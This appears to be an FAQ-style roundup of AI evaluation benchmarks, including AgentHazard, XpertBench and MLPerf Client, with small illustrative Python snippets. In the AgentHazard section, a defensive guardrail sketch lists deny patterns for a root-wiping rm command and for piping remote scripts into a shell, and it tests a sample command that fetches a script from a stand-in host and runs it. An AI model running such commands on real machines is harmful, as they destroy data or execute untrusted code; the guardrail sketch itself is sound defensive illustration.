AGI Evals & Meta-Automation

Key Questions

What is Video-MME-v2?

Video-MME-v2 is the next iteration of the Video-MME benchmark for comprehensive video understanding, evaluating how well multimodal models handle complex video tasks.

What is ClawArena?

ClawArena benchmarks AI agents in evolving information environments, testing how well they adapt to dynamic, real-world-like settings.

Why do single agents outperform multi-agents per Stanford?

A Stanford study finds that single agents often surpass multi-agent systems in efficiency; adding more agents does not reliably yield better results.
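
One intuition behind this result is coordination overhead, sketched in the toy cost model below. The token figures and the pairwise-messaging assumption are hypothetical illustrations, not from the Stanford paper.

```python
# Toy cost model (hypothetical numbers, not from the Stanford study):
# splitting a task across agents adds coordination messages that every
# pair of agents exchanges, so cost grows quadratically with agent count.
def total_tokens(n_agents: int, task_tokens: int = 2_000,
                 msg_tokens: int = 300) -> int:
    """Base task cost plus pairwise coordination traffic."""
    coordination = msg_tokens * n_agents * (n_agents - 1)
    return task_tokens + coordination

for n in (1, 2, 4, 8):
    print(f"{n} agent(s): ~{total_tokens(n):,} tokens")
```

Unless accuracy gains outpace that quadratic overhead, the single agent wins on efficiency.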

What is AgentHazard?

AgentHazard evaluates harmful behavior in computer-use agents, surfacing risks that arise when AI systems act autonomously on a user's machine.
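
For a concrete sense of what "harmful behavior" means for a computer-use agent, here is a minimal, hypothetical guardrail that screens proposed shell commands against a deny-list. It illustrates the risk surface being evaluated; it is not AgentHazard's methodology, and the patterns are made up.

```python
# Hypothetical guardrail sketch: screen a computer-use agent's proposed
# shell commands against a deny-list before execution.
import re

DENY_PATTERNS = [
    r"\brm\s+-rf\s+/",        # destructive filesystem wipes
    r"\bcurl\b.*\|\s*sh\b",   # piping remote scripts into a shell
    r"\bchmod\s+777\b",       # overly permissive file modes
]

def is_hazardous(command: str) -> bool:
    """Return True if the proposed command matches a known-bad pattern."""
    return any(re.search(p, command) for p in DENY_PATTERNS)

for cmd in ["ls -la", "curl http://x.example/install.sh | sh"]:
    verdict = "BLOCK" if is_hazardous(cmd) else "allow"
    print(f"{verdict}: {cmd}")
```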

What is MLPerf Client v1.6?

MLPerf Client v1.6 ships performance optimizations and a better user experience, continuing its role as a standard for comparing AI performance across hardware.
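
As a sketch of what client-side benchmarking involves (not MLPerf's actual harness), the snippet below times repeated runs of a workload and reports the median, which damps warm-up and scheduler noise.

```python
# Minimal timing-harness sketch: run a workload several times and
# report the median wall-clock time per run.
import statistics
import time

def benchmark(workload, repeats: int = 10) -> float:
    """Median seconds per run over `repeats` runs."""
    timings = []
    for _ in range(repeats):
        start = time.perf_counter()
        workload()
        timings.append(time.perf_counter() - start)
    return statistics.median(timings)

# Example workload: a stand-in for a model inference call.
print(f"median: {benchmark(lambda: sum(range(1_000_000))):.4f}s")
```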

What does Google say about AI benchmark raters?

A Google study at AAAI-26 finds that many AI benchmarks rely on too few human raters to produce statistically reliable scores, and calls for more robust evaluation methodology.
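
A small simulation (with made-up quality and noise parameters, not the study's data) shows why rater count matters: the panel-to-panel variance of an item's average rating shrinks roughly as 1/sqrt(n).

```python
# Simulate noisy human ratings of one item and watch how much the
# n-rater average varies from panel to panel as raters are added.
import random
import statistics

random.seed(0)
TRUE_QUALITY = 0.7   # hypothetical "true" score of one benchmark item
RATER_NOISE = 0.2    # hypothetical per-rater disagreement (std dev)

def simulated_rating() -> float:
    """One rater's score: true quality plus individual noise."""
    return TRUE_QUALITY + random.gauss(0, RATER_NOISE)

for n_raters in (1, 3, 10, 30, 100):
    panel_means = [
        statistics.fmean(simulated_rating() for _ in range(n_raters))
        for _ in range(2000)
    ]
    spread = statistics.stdev(panel_means)
    print(f"{n_raters:>3} raters -> mean score varies by ±{spread:.3f}")
```

With one rater, the reported score wanders by roughly the full per-rater noise; it takes dozens of raters before the estimate stabilizes.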

What is XpertBench?

XpertBench provides expert-level tasks with rubric-based grading, assessing advanced AI capabilities against explicit criteria rather than a single pass/fail judgment.
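
A minimal sketch of rubric-based scoring is below; the criteria, weights, and scores are hypothetical and do not reproduce XpertBench's actual rubrics.

```python
# Rubric-based scoring sketch: grade an answer on several weighted
# criteria and aggregate into one normalized score.
from dataclasses import dataclass

@dataclass
class Criterion:
    name: str
    weight: float      # relative importance of this criterion
    score: float       # grader's score in [0, 1] for this criterion

def rubric_score(criteria: list[Criterion]) -> float:
    """Weighted average of per-criterion scores, normalized to [0, 1]."""
    total_weight = sum(c.weight for c in criteria)
    return sum(c.weight * c.score for c in criteria) / total_weight

answer_rubric = [
    Criterion("correct final result", weight=3.0, score=1.0),
    Criterion("sound intermediate reasoning", weight=2.0, score=0.5),
    Criterion("cites relevant evidence", weight=1.0, score=0.0),
]
print(f"rubric score: {rubric_score(answer_rubric):.2f}")  # 0.67
```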

What are common pitfalls in AI benchmarks?

Common pitfalls go beyond the headline numbers: inefficiency patterns hidden by accuracy-only reporting, and over-reliance on a single metric. Meaningful evaluation requires understanding a benchmark's context and limitations.
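
The sketch below illustrates one such pitfall with made-up run records: a headline accuracy number can look healthy while token usage reveals wasteful solves and long failure loops.

```python
# Report efficiency next to accuracy. The run records and field names
# are illustrative, not from any specific benchmark.
runs = [
    {"solved": True,  "tokens": 1_200},
    {"solved": True,  "tokens": 9_800},   # solved, but wastefully
    {"solved": False, "tokens": 15_000},  # long failure loop
    {"solved": True,  "tokens": 1_500},
]

n_solved = sum(r["solved"] for r in runs)
accuracy = n_solved / len(runs)
tokens_per_solve = sum(r["tokens"] for r in runs) / max(n_solved, 1)

print(f"accuracy: {accuracy:.0%}")                         # 75% — looks healthy
print(f"tokens per solved task: {tokens_per_solve:,.0f}")  # ~9,167 — reveals the waste
```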

In brief: Video-MME-v2; Claw-Eval trustworthiness; agent skills in the wild; tool-reasoning inefficiencies; Paper Circle research agents; Stanford's single-versus-multi-agent finding; ClawArena; Google's AAAI-26 rater study; MLPerf Client v1.6; XpertBench; Agentic-MME; AgentHazard; TBSP; ARC-AGI-3 at ~57%; AI Scientist; SkillX; benchmark pitfalls. The through-line: evaluations are maturing even as agent risks mount.

Updated Apr 8, 2026